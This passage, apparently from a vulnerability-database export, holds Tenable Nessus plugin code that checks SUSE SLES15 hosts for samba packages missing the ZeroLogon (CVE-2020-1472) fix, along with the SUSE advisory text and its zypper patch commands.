value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-binding0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-binding0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-policy-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-policy0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap2-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap2-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-client-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-client-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-core-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-debugsource-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-libs-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-libs-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-winbind-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-winbind-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:35", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : samba (SUSE-SU-2020:2722-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy0", "p-cpe:/a:novell:suse_linux:libsamba-policy0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-ad-dc", "p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python", "p-cpe:/a:novell:suse_linux:samba-libs-python-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-python", "p-cpe:/a:novell:suse_linux:samba-python-debuginfo", "p-cpe:/a:novell:suse_linux:samba-python3", "p-cpe:/a:novell:suse_linux:samba-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2722-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143732", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2722-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143732);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : samba (SUSE-SU-2020:2722-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202722-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?04764abc\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Python2 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP1-2020-2722=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-2722=1\n\nSUSE Linux Enterprise High Availability 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-SP1-2020-2722=1\n\nSUSE Enterprise Storage 6 :\n\nzypper in -t patch SUSE-Storage-6-2020-2722=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", 